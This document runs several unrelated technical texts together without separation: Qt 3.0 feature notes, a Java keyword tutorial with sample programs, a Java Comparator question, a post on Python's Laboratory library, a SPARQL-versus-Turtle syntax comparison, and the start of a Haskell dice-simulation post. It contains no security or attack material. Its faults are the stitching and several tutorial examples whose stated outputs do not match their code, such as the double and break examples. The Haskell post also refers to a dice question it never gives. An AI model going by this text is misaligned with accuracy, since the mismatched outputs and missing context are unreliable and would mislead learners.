If you're unfamiliar with Haskell and find the . and $ confusing, this Stack Overflow article might help.
Some helpful utility functions
Haskell has many list handling functions in the standard Data.List package. However, it will be useful to define several new functions, all of which are simple wrappers around Data.List.Split:
import qualified Data.List.Split as Sp

splitAfter :: (a -> Bool) -> [a] -> [[a]]
splitAfter p = Sp.split (Sp.keepDelimsR $ Sp.whenElt p)

splitBefore :: (a -> Bool) -> [a] -> [[a]]
splitBefore p = Sp.split (Sp.keepDelimsL $ Sp.whenElt p)

takeUntil :: (a -> Bool) -> [a] -> [a]
takeUntil p = head . (splitAfter p)

Hopefully the names and function signatures are enough to explain what these do, but here are some examples:
ghci> splitAfter (== 'c') "abcdefabcdef"
["abc","defabc","def"]
ghci> splitBefore (== 'c') "abcdefabcdef"
["ab","cdefab","cdef"]
ghci> takeUntil (== 'c') "abcdefabcdef"
"abc"
As is perhaps clear now, our general plan for simulating the dice rolls will be to take the infinite list of rolls, then cut it into sections whose lengths we'll average. With this in mind, we'll find a few other functions helpful too:
averageOver :: Integral a => Int -> [a] -> Double
averageOver n xs = (fromIntegral sigma) / (fromIntegral n)
  where sigma = sum $ take n xs

averageLength :: Int -> [[a]] -> Double
averageLength n = averageOver n . map length

We can easily calculate the mean dice-roll:
ghci> averageOver 10000 $ rolls 42
3.4912
However, we're usually interested in the average length of a sequence, so here's a (very artificial) example:
ghci> averageLength 10000 . map (\n -> replicate n 'a') $ rolls 42
3.4912
To see why this works consider what the map does to the first five rolls:
ghci> take 5 $ rolls 42
[6,4,2,5,3]
ghci> take 5 .
map (\n -> replicate n 'a') $ rolls 42
["aaaaaa","aaaa","aa","aaaaa","aaa"]
The simulations
Having prepared our tools, we can now actually tackle the questions.
Part A
The question asks: What is the mean number of rolls from one six to the next six?
A reasonable approach is to split the list of rolls whenever we see a six, then measure the lengths of the sublists:
a_seqs :: [Roll] -> [[Roll]]
a_seqs = splitAfter (== 6)

ghci> take 4 . a_seqs $ rolls 42
[[6],[4,2,5,3,2,1,6],[1,4,4,4,1,3,3,2,6],[2,4,1,3,1,1,5,5,5,1,3,6]]
ghci> averageLength 1000 . a_seqs $ rolls 42
6.137
ghci> averageLength 100000 . a_seqs $ rolls 42
5.98306
It seems likely, and unsurprisingly, that this answer will tend to six as the number of samples tends to infinity. This is easy to show analytically too! Given that the die is fair, there is a one-sixth chance of rolling a six, and a five-sixths chance of not. So, the chance of having to wait n rolls for a six is:
\[ p(n) = \frac{1}{6} \times \left(\frac{5}{6}\right)^{n-1}, \]
and thus the mean number of rolls is given by,
\[ \mu_A = \sum_{i = 1}^{\infty} i \ \times \theta \, \left(1 - \theta\right)^{i-1}, \]
where \(\theta = 1/6\). Evaluating this (it is the mean of a geometric distribution) does indeed give,
\[ \mu_A = \frac{1}{\theta} = 6. \]
Parts B & C
The question asks: Between two rolls, the clock strikes one. What is the mean number of rolls until the next six?
The first problem here is that we have no notion of time in our simulation, so let's add one:
addTimes :: [a] -> [(Time,a)]
addTimes = zip times
  where times = cycle [0..longPeriod - 1]

ghci> take 5 $ rolls 42
[6,4,2,5,3]
ghci> take 5 . addTimes $ rolls 42
[(0,6),(1,4),(2,2),(3,5),(4,3)]
We've replaced the list of rolls with a list of (time, roll) pairs. We need some convention about time: let's say that "one o'clock" corresponds to t = 0, and the roll happens after the tick. Thus (0,6) means that the roll immediately after the clock struck was a 6. Simulating this part is a little bit more complicated, but it's not too bad.
Begin by splitting the list when the clock chimes, then discard the sequence after the first 6. In code:
b_seqs :: [Roll] -> [[(Time,Roll)]]
b_seqs = map (takeUntil (\(t, r) -> r == 6))
       . splitAfter (\(t,r) -> t == 0)
       . addTimes

ghci> take 3 . b_seqs $ rolls 42
[[(0,6)]
,[(1,4),(2,2),(3,5),(4,3),(5,2),(6,1),(7,6)]
,[(1,3),(2,1),(3,2),(4,6)]]
ghci> averageLength 1000 . b_seqs $ rolls 42
6.21
ghci> averageLength 100000 . b_seqs $ rolls 42
6.01542
The calculation is noticeably slower, but the answer seems to be the same. That seems reasonable: we are just picking random points in the sequence of rolls and starting our count there. Nothing in the analytic result above cares where we start, so the analytic result is also unchanged!
Although I've not done it explicitly here, I think it's clear that part C is just the same but with time running backwards.
Part D
The question asks: What is the mean number of rolls from the six before the clock struck to the next six?
Today, it seems sensible to me to tackle this question by splitting the list of rolls every time we see a six, then throwing out those sequences in which the clock doesn't chime. The code is straightforward and gives the right answer:
d_seqs :: [Roll] -> [[(Time,Roll)]]
d_seqs = filter (any (\(t,r) -> t == 0))
       . splitAfter (\(t,r) -> r == 6)
       . addTimes

ghci> averageLength 100000 . d_seqs $ rolls 42
11.1093
However, I worry somewhat that this code is only easy to write because I know how to think about the question. So, here's a messier approach which relates more closely to the words in MacKay's book.
We begin by adding another component to the list of rolls, which counts how long it's been since we rolled a six. A couple of caveats: it fudges the start of the sequence, and it resets the count in the tuple after the six is rolled:
addTimeSince6 :: [Roll] -> [(Roll,Int)]
addTimeSince6 = tail .
addT
  where addT xs = (0,0) : zipWith f xs (addT xs)
        f r (r',i) = (r, if r' == 6 then 1 else i + 1)

ghci> addTimeSince6 [1,2,6,1,2,6,1,2]
[(1,1),(2,2),(6,3),(1,1),(2,2),(6,3),(1,1),(2,2)]
ghci> addTimes . addTimeSince6 $ [1,2,6,1,2,6,1,2]
[(0,(1,1)),(1,(2,2)),(2,(6,3)),(3,(1,1)),(4,(2,2)),(5,(6,3)),(6,(1,1)),(7,(2,2))]
If we annotate this sequence with the time, and split it where the clock chimes, we can read off the length directly by looking for the first six in the break:
d_lengths' :: [Roll] -> [Int]
d_lengths' = tail . map len . splitBefore (\(t,(r,q)) -> t == 0) . addTimes . addTimeSince6
  where len [] = 0
        len xs = head [ q | (t,(r,q)) <- xs, r == 6]

ghci> averageOver 3000 . d_lengths' $ rolls 42
11.08
The code is slow (which is why we only consider 3,000 samples) but it appears to get the same result! If we wanted to be sure, we can compare the lengths directly:
*Main> take 20 . map length . d_seqs $ rolls 42
[1,14,43,7,13,8,6,9,5,7,27,41,1,3,22,14,8,9,18,9]
*Main> take 20 . d_lengths' $ rolls 42
[1,14,43,7,13,8,6,9,5,7,27,41,1,3,22,14,8,9,18,9]
Happily these sequences agree, at least up to the first twenty terms. Less happily, I think the code is rather messy, and probably reasonably opaque if you're not familiar with Haskell.
Finally, let's derive this analytically. The key insight here is that the chance of the clock chiming in a particular run between sixes depends on the length of the sequence. Although all ticks are equally likely to hear the clock chime, longer sequences have more ticks and so are more likely. Thus the probability of being in a sequence of length \(i\) when the clock chimes is,
\[ q_i \propto i \times p_i. \]
Now,
\[ p_i \propto \left(1 - \theta\right)^{i - 1}, \]
so,
\[ q_i \propto i \times \left(1 - \theta\right)^{i-1}. \]
Thus, multiplying all terms by \(1 - \theta\), the mean number is given by
\[ \mu_D = \frac{\sum_{i = 1}^{\infty}{i^2\, \left(1 - \theta\right)^i}}{\sum_{i = 1}^{\infty}{i\, \left(1 - \theta\right)^i}}.
\]
Evaluating this does indeed show that
\[ \mu_D = \frac{2}{\theta} - 1 = 11. \]
Other ways to (roll a) die
As we mentioned above, because we hide all the randomness behind the infinite list of rolls, it is easy to consider other situations without changing the analysis code.
A dodgy die
Suppose we have a dodgy die which, due to bad planning, has six dots painted where there should be five. In other words, the chance of rolling a six is now one-third. How does this affect our answers?
addBias :: [Roll] -> [Roll]
addBias = map (\i -> if i == 5 then 6 else i)

ghci> take 10 $ rolls 42
[6,4,2,5,3,2,1,6,1,4]
ghci> take 10 . addBias $ rolls 42
[6,4,2,6,3,2,1,6,1,4]
ghci> averageLength 10000 . a_seqs . addBias $ rolls 42
3.0129
ghci> averageLength 10000 . d_seqs . addBias $ rolls 42
4.958
So, it seems that the means change to 3 and 5. Sure enough, if we put \(\theta = 1/3\) into the expressions we derived above we find that:
\[ \mu_A = 3, \mu_D = 5. \]
A magic die
Now suppose that instead of an incompetent manufacturer, our die came from a magician. In particular, suppose that the die always rolls the sequence 1,2,3,4,5,6,1,2,... It is easy to simulate:
magicRolls :: [Roll]
magicRolls = cycle [1..6]

ghci> take 10 $ magicRolls
[1,2,3,4,5,6,1,2,3,4]
*Main> averageLength 10000 . a_seqs $ magicRolls
6.0
*Main> averageLength 10000 . d_seqs $ magicRolls
6.0
\(\mu_A\) stays the same, but \(\mu_D\) is now six! To understand why, it is important to notice that the magic die rolls a six on every sixth roll, and so the sequences between sixes are all precisely six rolls long. This means that the chime is equally likely to fall into any of the sequences, and whichever one it does pick is bound to be six rolls long.
Implementation notes
Performance issues
Although Haskell is a very pleasant environment for doing this sort of work, in practice you can hit performance issues.
There are a couple of problems:
- The ghci REPL doesn't compile the code efficiently, so in practice you're better off compiling the code as a library, then loading the object into ghci.
- There are space leaks in the code, so it doesn't scale well. For the simple sequence stuff this isn't a problem, but for the second part D calculation it is a nuisance.
Day length
Although the question talks about a daily chime, in practice all we need are events sufficiently widely spaced that they won't interact. This translates to saying that we can be confident that a six will occur between two sets of chimes. Days are 86,400 seconds long, so one o'clock chimes occur at least 43,200 seconds apart. However, given that
\[ \left(\frac{5}{6}\right)^{100} \approx 1.2 \times 10^{-8} \]
it seems enough to work in a world where the chimes happen every 100 seconds. The code above does this, and runs much more quickly as a result.
Python client for the Arris TG2492LG
Project description
Arris TG2492LG Python client
An unofficial Python client for retrieving information from the Arris TG2492LG router. The Arris TG2492LG is one of two routers that Ziggo, a cable operator in the Netherlands, provides to their customers as the Ziggo Connectbox. The current functionality is limited to retrieving a list of devices that are connected to the router.
Usage
List all connected devices:
from arris_tg2492lg import ConnectBox

connectBox = ConnectBox("", "password")
devices = connectBox.get_connected_devices()
print(devices)
Please note that the list of connected devices includes devices that are offline (e.g. devices that just went out of range of the wifi). The Device class contains a property online that can be checked. An example of retrieving a list of the MAC addresses of all online devices is included in the examples folder:
python3 list_online_devices.py --host --password <password>
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
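The online filtering mentioned above can be sketched without the router present. The `Device` dataclass below is only a stand-in for the library's own Device class: the `online` property is documented above, while the `mac` attribute name is an assumption made for this illustration.

```python
from dataclasses import dataclass

@dataclass
class Device:
    """Stand-in for arris_tg2492lg's Device class (attribute names assumed)."""
    mac: str
    online: bool

def online_macs(devices):
    """Return the MAC addresses of the devices that are currently online."""
    return [d.mac for d in devices if d.online]

# With the real library, this list would come from
# ConnectBox(...).get_connected_devices() instead.
devices = [
    Device(mac="aa:bb:cc:dd:ee:01", online=True),
    Device(mac="aa:bb:cc:dd:ee:02", online=False),
]
print(online_macs(devices))  # ['aa:bb:cc:dd:ee:01']
```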
printf, fprintf, sprintf - Print formatted output
Standard C Library (libc.so, libc.a)
#include <stdio.h>
int printf( const char *format [,value]...);
int fprintf( FILE *stream, const char *format [,value]...);
int sprintf( char *string, const char *format [,value]...);
Interfaces documented on this reference page conform to industry standards as follows: fprintf(), printf(), sprintf(): ISO C, XPG4, XPG4-UNIX. Refer to the standards(5) reference page for more information about industry standards and associated tags.
format — Specifies a character string combining literal characters with conversion specifications.
value — Specifies the data to be converted according to the format parameter.
stream — Points to a FILE structure specifying an open stream to which converted values will be written.
string — Points to a character array in which the converted values will be stored.
The printf() function converts, formats, and writes its value parameters, under control of the format parameter, to the standard output stream stdout. The fprintf() function converts, formats, and writes its value parameters, under control of the format parameter, to the output stream specified by the stream parameter. The sprintf() function converts, formats, and stores its value parameters, under control of the format parameter, into consecutive bytes starting at the address specified by the string parameter. The sprintf() function places a null character \0 at the end. You must ensure that enough storage space is available to contain the formatted string.
The e, E, f, and g formats represent the special floating-point values as follows: +NaNQ or -NaNQ; +NaNS or -NaNS; +INF or -INF; +0 or -0.
All forms of the printf() functions allow for the insertion of a language-dependent radix character in the output string.
The radix character is defined by langinfo data in the program's locale (category LC_NUMERIC). In the POSIX (C) locale, or in a locale where the radix character is not defined, the radix character defaults to . (period).

The st_ctime and st_mtime fields of the file are marked for update between the successful execution of the printf() or fprintf() function and the next successful completion of a call to fflush() or fclose() on the same stream.

On successful completion, these functions return the number of bytes in the output string. Otherwise, a negative value is returned. The value returned by the sprintf() function does not include the final '\0' (null) character.

The printf() or fprintf() functions fail if either the stream is unbuffered or the stream's buffer needed to be flushed and the function call caused an underlying write() or lseek() function to be invoked. In addition, if the printf() or fprintf() function fails, errno is set to one of the following values:

  An invalid wide character was detected.

  The operation was interrupted by a signal that was caught, and no data was transferred.

  The implementation supports job control; the process is a member of a background process group and is attempting to write to its controlling terminal.

conv(3), ecvt(3), putc(3), scanf(3), vprintf(3), vwprintf(3), wprintf(3), wscanf(3)
http://backdrift.org/man/tru64/man3/fprintf.3.html
CC-MAIN-2017-22
refinedweb
494
54.22
return to main index

The python scripts presented here are intended to illustrate some of the tasks that Rifs can perform. The reader should review the tutorial RfM: Batch Filtering before continuing with this tutorial.

Using the batchRenderRI() proc with Maya (see RfM: Batch Rendering) a Rif or Rifs may be specified as follows.

    batchRenderRI("rif_it", 1);
or
    batchRenderRI("rif_it.Rif()", 1);

The second arg indicates whether "rman genrib" should be used to generate a fresh set of ribs. If only the name of the module is specified then ribops.py assumes the name of the class is 'Rif'. Therefore, rif_it is considered to be the same as rif_it.Rif(). Multiple Rifs can be specified as follows.

    batchRenderRI("rif_it;rif_meshToBlobby(0.5)");

Note the use of a semi-colon to separate the names of the Rifs. Spaces must not appear anywhere within the double quotations. String arguments must be specified with single quotes ie.

    batchRenderRI("rif_it;rif_shadinginterpolation('smooth')", 1);

The first Rif edits the Display statement of a rib so that a deep image file is saved to disk - suitable for deep compositing in Nuke. For example,

    batchRenderRI("rif_deepimage.Rif()", 1);

would convert a Display statement such as,

    Display "renderman/first/images/first.0003.iff" "mayaiff" "rgba"

to

    Display "renderman/first/images/first.0003.dtex" "deepshad" "rgba"

Listing 1 (rif_deepimage.py)

    import prman, os

    class Rif(prman.Rif):
        def Display(self, name, driver, channels, params):
            if driver != 'shadow' and driver != 'deepshad' and driver != 'null':
                driver = 'deepshad'
                name = os.path.splitext(name)[0]
                name = name + '.dtex'
                self.m_ri.Display(name, driver, channels)
            else:
                self.m_ri.Display(name, driver, channels, params)

The third Rif converts a "standard" blobby produced by, say, a Maya particle emitter to a blobby that can be rendered as a volume primitive.
A typical Maya/RfM rib archive that defines a standard Blobby primitive will look like this,

    ##RenderMan RIB version 3.04
    Blobby 3 [1001 0 1001 16 1001 32 0 3 0 1 2]
        [1 0 0 0 0 1 0 0 0 0 1 0 -0.5 0.2 0.0 1
         1 0 0 0 0 1 0 0 0 0 1 0 0.9 0.5 0.0 1
         1 0 0 0 0 1 0 0 0 0 1 0 0.5 -0.5 0.0 1] [""]

When rendered the Blobby would appear as shown in figure 2. But when converted to a volume primitive and rendered with an appropriate surface shader it will look completely different - figure 3.

Figure 2 A standard Blobby
Figure 3 A Volume Blobby

A Blobby can be rendered as a volume primitive if its sequence of opcodes begins with 8.

    Blobby 3 [8 1001 0 1001 16 1001 32 0 3 0 1 2]
        ...transformation data...

Currently RMS (version 3) does not provide a convenient way of specifying a Blobby as a volume primitive. The Rif shown in listing 3 adds the required opcode.

Listing 3 (rif_volumeblobby.py)

    import prman

    class Rif(prman.Rif):
        def Blobby(self, numblobs, opcodes, xyz, strs, params):
            opcodes = (8,) + opcodes
            self.m_ri.Blobby(numblobs, opcodes, xyz, strs, params)

The next Rif converts all polymeshes, specified in a rib by the PointsGeneralPolygons statement, to a Blobby. Figure 4 shows the appearance of a mesh in Maya and how it might appear in the final image.
Listing 4 (rif_meshToBlobby.py)

    import prman

    class Rif(prman.Rif):
        def __init__(self, ri, scale):
            self.scale = float(scale)
            prman.Rif.__init__(self, ri)

        def PointsGeneralPolygons(self, nloops, nverts, verts, params):
            opcodes = []
            numblobs = len(params['P'])/3
            for n in range(numblobs):
                opcodes.append(1001)
                opcodes.append(n * 16)
            opcodes.append(0)        # blending code
            opcodes.append(numblobs) # blend all blobs
            for n in range(numblobs):
                opcodes.append(n)    # indices of the blobs to blend
            common = (self.scale,0,0,0, 0,self.scale,0,0, 0,0,self.scale,0)
            transforms = (self.scale,0,0,0, 0,self.scale,0,0, 0,0,self.scale,0)
            xyz = params['P']
            numxyz = len(xyz)
            for n in range(0, numxyz, 3):
                pos = (xyz[n], xyz[n+1], xyz[n+2])
                if n == 0:
                    transforms = common + pos + (1,)
                else:
                    transforms = transforms + common + pos + (1,)
            params = {}
            strs = ('',)
            self.m_ri.Blobby(numblobs, opcodes, transforms, strs, params)

Figure 4 PointsGeneralPolygons converted to a Blobby

This Rif changes the diameter (constantwidth) of the points defined by the rib Points statement. Notice in this example the Points() method receives two inputs, num_points and params, but the call to the base class, self.m_ri.Points(params), outputs only one argument.

Listing 5 (rif_points_width.py)

    import prman

    class Rif(prman.Rif):
        def __init__(self, ri, width):
            self.width = (width,)
            prman.Rif.__init__(self, ri)

        def Points(self, num_points, params):   # two args in
            params['constantwidth'] = self.width
            self.m_ri.Points(params)            # one arg out

This Rif reads the xyz locations of the points defined by the rib Points statement and outputs an archive at each location.
Listing 6 (rif_points_archive.py)

    import prman

    class Rif(prman.Rif):
        def __init__(self, ri, archive_path):
            self.archive_path = archive_path
            prman.Rif.__init__(self, ri)

        def Points(self, num_points, params):
            if self.archive_path != '':
                coords = params['P']
                for n in range(0, num_points, 3):
                    x = coords[n]
                    y = coords[n+1]
                    z = coords[n+2]
                    self.m_ri.TransformBegin()
                    self.m_ri.Translate(x, y, z)
                    self.m_ri.ReadArchive(self.archive_path)
                    self.m_ri.TransformEnd()
            else:
                self.m_ri.Points(params)

Figure 5 Regular Points
Figure 6 Points replaced by archives
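The listings above all follow one pattern: a class overrides a rib-call method, rewrites its arguments, and forwards the call to an output interface. That pattern can be illustrated without RenderMan installed at all. The sketch below is a hypothetical stand-in (BaseFilter plays the role of prman.Rif, and a plain list stands in for the Ri output) just to show the mechanics of Listing 1:

```python
import os

class BaseFilter:
    """Stand-in for prman.Rif: by default, calls pass straight through."""
    def __init__(self, out):
        self.m_ri = out  # plays the role of the Ri output interface

    def Display(self, name, driver, channels):
        self.m_ri.append(('Display', name, driver, channels))

class DeepImageFilter(BaseFilter):
    """Rewrites the display driver, mirroring rif_deepimage.py above."""
    def Display(self, name, driver, channels):
        if driver not in ('shadow', 'deepshad', 'null'):
            driver = 'deepshad'
            name = os.path.splitext(name)[0] + '.dtex'
        self.m_ri.append(('Display', name, driver, channels))

calls = []
f = DeepImageFilter(calls)
f.Display('first.0003.iff', 'mayaiff', 'rgba')
# calls[0] is now ('Display', 'first.0003.dtex', 'deepshad', 'rgba')
```

In the real tool the forwarding target is PRMan's Ri binding rather than a list, but the interception logic is the same.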
http://fundza.com/rfm/rif_examples1/index.html
CC-MAIN-2017-04
refinedweb
907
60.51
When I stumbled across Elasticsearch for the first time, I was fascinated by its ease of use, speed and configuration options. Every time I worked with it, I found an even simpler way to achieve what I was used to solving with traditional Natural Language Processing (NLP) tools and techniques. At some point I realized that it can solve a lot of things out of the box that I was trained to implement from scratch.

Most NLP tasks start with a standard preprocessing pipeline:

- Gathering the data
- Extracting raw text
- Sentence splitting
- Tokenization
- Normalizing (stemming, lemmatization)
- Stopword removal
- Part of Speech tagging

Some NLP tasks such as syntactic parsing require deep linguistic analysis. For this kind of task Elasticsearch doesn't provide the ideal architecture and data format out of the box. That is, for tasks that go beyond token-level, custom plugins accessing the full text need to be written or used. But tasks such as classification, clustering, keyword extraction, measuring similarity etc. only require a normalized and possibly weighted Bag of Words representation of a given document.

Steps 1 and 2 can be solved with the Ingest Attachment Processor Plugin (before 5.0 Mapper Attachments Plugin) in Elasticsearch. Raw text extraction for these plugins is based on Apache Tika, which works on the most common data formats (HTML/PDF/Word etc.). Steps 4 to 6 are solved with the language analyzers out of the box.

Sample mapping:

{
  "properties":{
    "content":{
      "type":"text",
      "analyzer":"german"
    }
  }
}

If the mapping type for a given field is "text" (before 5.0: "analyzed string") and the analyzer is set to one of the languages natively supported by Elasticsearch, tokenization, stemming and stopword removal will be performed automatically at index time. So no custom code and no other tool is required to get from any kind of document supported by Apache Tika to a Bag of Words representation.
The language analyzers can also be called via the REST API when Elasticsearch is running.

curl -XGET "" -d'
{
  "text" : "This is a test."
}'

{
  "tokens":[
    {
      "token":"test",
      "start_offset":10,
      "end_offset":14,
      "type":"<ALPHANUM>",
      "position":3
    }
  ]
}

The non-Elasticsearch approach looks like this: gathering the text with custom code, document parsing by hand or with the Tika library, and using a traditional NLP library or API like NLTK, OpenNLP, Stanford NLP, Spacy or anything else which has been developed in some research department. However, tools developed at research departments are usually not very useful for an enterprise context. Very often the data formats are proprietary, the tools need to be compiled and executed on the command line, and the results are very often simply piped to standard out. REST APIs are an exception.

With the Elasticsearch language analyzers, on the other hand, you only need to configure your mapping and index the data. The pre-processing happens automatically at index time.

Traditional approach to text classification

Text classification is a task traditionally solved with supervised machine learning. The input to train a model is a set of labelled documents. The minimal representation of this would be a JSON document with 2 fields: "content" and "category". Traditionally, text classification can be solved with a tool like SciKit Learn, Weka, NLTK, Apache Mahout etc.

Creating the models

Most machine learning algorithms require a vector space model representation of the data. The feature space is usually something like the 10,000 most important words of a given dataset. How can the importance of a word be measured? Usually with TF-IDF, a weighting formula invented in the 1970s. TF-IDF is a weight that scores a term within a given document relative to the rest of the dataset.
If a term in a document has a high TF-IDF score it means that it is a very characteristic keyword and distinguishes the document from all other documents by means of that word. The keywords with the highest TF-IDF scores in a subset of documents can represent a topic. For text classification a feature space with the n words with the highest overall TF-IDF scores is quite common. Each document is converted to a feature vector, then with all training instances for each class/category a model is created. After that new documents can be classified according to this model: the document is converted to a feature vector, all similarities are computed, and the document is labelled with the category with the highest score.

Text Classification with Elasticsearch

All the above can be solved in a much simpler way with Elasticsearch (or Lucene). You just need to execute 4 steps:

- Configure your mapping ("content" : "text", "category" : "keyword")
- Index your documents
- Run a More Like This Query (MLT Query)
- Write a small script that aggregates the hits of that query by score

PUT sample

POST sample/document/_mapping
{
  "properties":{
    "content":{
      "type":"text",
      "analyzer":"english"
    },
    "category":{
      "type":"text",
      "analyzer":"english",
      "fields":{
        "raw":{
          "type":"keyword"
        }
      }
    }
  }
}

POST sample/document/1
{
  "category":"Apple (Fruit)",
  "content":."
}

POST sample/document/2
{
  "category":"Apple (Company)",
  "content":."
}

The MLT query is a very important query for text mining. How does it work? It can process arbitrary text, extract the top n keywords relative to the actual "model" and run a boolean match query with those keywords. This query is often used to gather similar documents. If all documents have a class/category label and a similar number of training instances per class this is equivalent to classification.
Just run a MLT query with the input document as the like-field and write a small script that aggregates score and category of the top n hits.

GET sample/document/_search
{
  "query":{
    "more_like_this":{
      "fields":[
        "content",
        "category"
      ],
      "like":.",
      "min_term_freq":1,
      "max_query_terms":20
    }
  }
}

This sample is only intended to illustrate the workflow. For real classification you will need a bit more data. So don't worry if with that example you won't get any actual result. Just add more data and it works.

And here's a little Python script that processes the response and returns the most likely category for the input document.

from operator import itemgetter

def get_best_category(response):
    categories = {}
    for hit in response['hits']['hits']:
        score = hit['_score']
        for category in hit['_source']['category']:
            if category not in categories:
                categories[category] = score
            else:
                categories[category] += score
    if len(categories) > 0:
        sortedCategories = sorted(categories.items(), key=itemgetter(1), reverse=True)
        category = sortedCategories[0][0]
    return category

And there is your Elasticsearch text classifier!

Use cases

Classification of text is a very common real world use case for NLP. Think of e-commerce data (products). Lots of people run e-commerce shops with affiliate links. The data is provided by several shops and often comes with a category tag. But each shop has a different category tag, so the category systems need to be unified and hence all the data needs to be re-classified according to the new category tree. Or think of a Business Intelligence application where company websites need to be classified according to their sector (hairdresser vs. bakery etc).

Evaluation

I evaluated this approach with a standard text classification dataset: the 20 Newsgroups dataset. The highest precision (92% correct labels) was achieved with a high quality score threshold that included only 12% of the documents.
When labelling all documents (100% Recall), 72% of the predictions were correct. The best algorithms for text classification on the 20 Newsgroups dataset are usually SVM and Naive Bayes. They have a higher average accuracy on the entire dataset. So why should you consider using Elasticsearch for classification if there are better algorithms?

There are a few practical reasons: training an SVM model takes a lot of time. Especially when you work in a startup or need to adapt quickly for different customers or use cases, that might become a real problem. So you may not be able to retrain your model every time your data changes. I experienced this myself working on a project for a big German bank. Hence you end up working with outdated models, and those will certainly not score as well anymore. With the Elasticsearch approach, training happens at index time and your model can be updated dynamically at any point in time with zero downtime of your application. If your data is stored in Elasticsearch anyway, you don't need any additional infrastructure. With over 10% highly accurate results you can usually fill the first page. In many applications that's enough for a first good impression.

Why then use Elasticsearch when there are other tools? Because your data is already there and it's going to pre-compute the underlying statistics anyway. It's almost like you get some NLP for free!

Saskia Vola studied Computational Linguistics at the University of Heidelberg and started working in the field of text mining in 2009. After a few years in the Berlin startup scene she decided to become a fulltime freelancer and enjoy life as a Digital Nomad. As she received more and more relevant project offers, she decided to start a platform for NLP/AI freelancers called textminers.io
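For readers who want to see the TF-IDF weighting from this article in isolation, here is a minimal hand-rolled sketch in Python. It does not use Elasticsearch, and the exact scoring formula Lucene applies internally differs in its details; this only shows the basic tf * log(N/df) idea:

```python
import math
from collections import Counter

def tf_idf(docs):
    """Compute TF-IDF weights for a list of tokenized documents.

    tf  = term count within the document
    idf = log(N / df), where df is the number of documents
          containing the term and N is the number of documents.
    """
    n_docs = len(docs)
    df = Counter()
    for doc in docs:
        df.update(set(doc))  # count each term once per document
    weights = []
    for doc in docs:
        tf = Counter(doc)
        weights.append({
            term: count * math.log(n_docs / df[term])
            for term, count in tf.items()
        })
    return weights

docs = [
    ["apple", "fruit", "tree"],
    ["apple", "company", "iphone"],
    ["banana", "fruit"],
]
w = tf_idf(docs)
# "fruit" occurs in 2 of 3 documents, so its idf is log(3/2);
# "tree" occurs in only one, so it scores higher within doc 0.
```

With a feature space built from the top-scoring terms, each document becomes the feature vector the article describes.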
https://www.elastic.co/blog/text-classification-made-easy-with-elasticsearch
CC-MAIN-2020-29
refinedweb
1,515
54.02
I realise this has been asked many times already, but I've just come from FOUR other threads with similar titles, tried what they said, and couldn't get it to work.

I have a script attached to an empty Game Object (with box collider attached). I want to instantiate a terrain piece as a child of the object. So far I have:

    var tile;
    tile = Instantiate (fHigh1, Vector3(r, 0, c), transform.rotation);
    tile.transform.parent = this;

A multitude of different errors pop up with every combination I try. I've also tried:

    tile.transform.parent = transform;
    tile.transform.parent = Transform;
    tile.Transform.parent = transform;
    tile.Transform.parent = Transform;
    tile.transform.this = transform;

Help please :(

Answer by fafase · Jan 31, 2013 at 08:26 AM

I would think your error is there:

    tile.transform.parent = this;

'this' represents the script not the object. Try:

    tile.transform.parent = transform;

The code below works for me (in C#):

    public class Script : MonoBehaviour {
        public GameObject tile;
        void Start () {
            GameObject obj = (GameObject)Instantiate(tile, new Vector3(0,0,0), Quaternion.identity);
            obj.transform.parent = transform;
        }
    }

Note: Since you are using UnityScript, if you have #pragma strict at the top, var tile; should be var tile:GameObject;

    var tile : GameObject;
    tile = Instantiate (fHigh1, Vector3(r, 0, c), transform.rotation);

Throws error: "BCE0022: Cannot convert 'UnityEngine.Transform' to 'UnityEngine.GameObject'."

And as you read above, I already tried: With no success. :( Perhaps it is in fact: but I have to fix the other issue first? Also, I don't know C# yet. XD

You may have different types of variables, so to make it simple just make them all GameObject:

    var obj:GameObject;
    var tile:GameObject;

    function Start () {
        tile = Instantiate(obj, Vector3(0,0,0), Quaternion.identity);
        tile.transform.parent = transform;
    }

I did what you said and played: InvalidCastException: Cannot cast from source type to destination type.
tileCollider.OnTriggerEnter (UnityEngine.Collider other) (at Assets/Scripts/tileCollider.js:57)

:( A preview:

    var tile : GameObject;
    var fHigh1 : GameObject;

    function OnTriggerEnter ( other : Collider ) {
        r = other.transform.position.x;
        c = other.transform.position.z;
        if ( other.gameObject.name == "fHigh1") {
            tile = Instantiate (fHigh1, Vector3(r, 0, c), Quaternion.identity);
        }
        tile.transform.parent = transform;
    }

Note the other.gameObject.name is referring to a DIFFERENT "fHigh1".
https://answers.unity.com/questions/390996/instantiate-terrain-object-as-child-of-empty-game.html
CC-MAIN-2020-05
refinedweb
438
50.23
Represents a path from a specific derived class (which is not represented as part of the path) to a particular (direct or indirect) base class subobject. More... #include "clang/AST/CXXInheritance.h" Represents a path from a specific derived class (which is not represented as part of the path) to a particular (direct or indirect) base class subobject. Individual elements in the path are described by the CXXBasePathElement structure, which captures both the link from a derived class to one of its direct bases and identification describing which base class subobject is being used. Definition at line 70 of file CXXInheritance.h. Definition at line 82 of file CXXInheritance.h. References Access, and clang::AS_public. Referenced by clang::CXXBasePaths::clear(). The access along this inheritance path. This is only calculated when recording paths. AS_none is a special value used to indicate a path which permits no legal access. Definition at line 75 of file CXXInheritance.h. Referenced by clang::Sema::CheckBaseClassAccess(), and clear(). The declarations found inside this base class subobject. Definition at line 80 of file CXXInheritance.h.
https://clang.llvm.org/doxygen/classclang_1_1CXXBasePath.html
CC-MAIN-2021-17
refinedweb
179
50.94
Answered by: Exception has been thrown by the target of an invocation

Hi, (VS 2005, Beta 2)

I get the error "Exception has been thrown by the target of an invocation" when I try to open any of the test windows using "Test|Windows|Test View" or any similar approach. I created a new solution a while ago and added some unit tests. Everything was working great, until now...

Anybody have any suggestions?

Thanks,
Tor Langlo
Monday, May 30, 2005 4:14 PM

I assume this is not just for your solution, and is across all projects?
Tuesday, May 31, 2005 5:55 PM

No, that's not correct. Today I created a new solution, and was able to add unit tests, and the tests show up in the Test View. My guess is something has gotten corrupted in the other solution. I've been doing a bit of renaming in it (namespaces, assemblies, directories), maybe this is the cause of the problem. I'll try to figure it out later.
Tor.
Wednesday, June 01, 2005 7:44 AM

I wouldn't worry that you have a corrupted solution or installation. This particular exception usually indicates a missing assembly reference. That is, at some point an assembly in team system referenced another assembly that wasn't in memory and could not be located. Did you install the Team Foundation client with VSTS? Does the problem you reported occur if you launch the IDE and don't load any solution whatsoever? Does the problem still repro if you load the original solution?
Michael
Tuesday, June 07, 2005 1:55 PM

